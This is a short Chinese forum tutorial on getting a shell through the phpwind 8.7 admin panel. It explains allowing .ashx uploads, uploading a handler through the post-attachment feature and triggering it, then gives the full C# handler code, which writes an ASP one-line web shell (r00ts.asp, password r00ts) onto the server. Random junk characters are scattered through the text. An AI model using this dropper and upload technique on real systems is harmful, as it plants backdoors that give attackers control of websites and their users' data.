phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
4 B/ B) a+ u  s- N- b$ e" O
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
: J5 c' B, l6 k; h1 i8 t+ u6 L
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整

然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx

+ E' a8 s# [6 B, j' A; y. ]打开之后空白 会在目录底下生成r00ts.asp 密码r00ts

2 f. l! v- A$ s( P8 y( ^下面是代码:

<%@ WebHandler Language="C#"Class="Handler" %>
& s- y1 d/ W& Z" W3 Wusing System;
! u% A/ J6 @; q4 Susing System.Web;
using System.IO;
- s8 W* w/ B6 H& C6 F, s4 apublic class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
0 M1 K8 M! p9 E7 @, m4 `file1.Write("<%eval request(\"r00ts\")%>");
file1.Flush();
file1.Close();
8 E/ Z2 }0 p& G5 ?}
, A5 [% P* R. ^  q! [3 {1 Lpublic bool IsReusable {
get {
8 H  p1 H- c0 d* M- mreturn false;
}
}
}
8 h, F3 F) a' g' t" O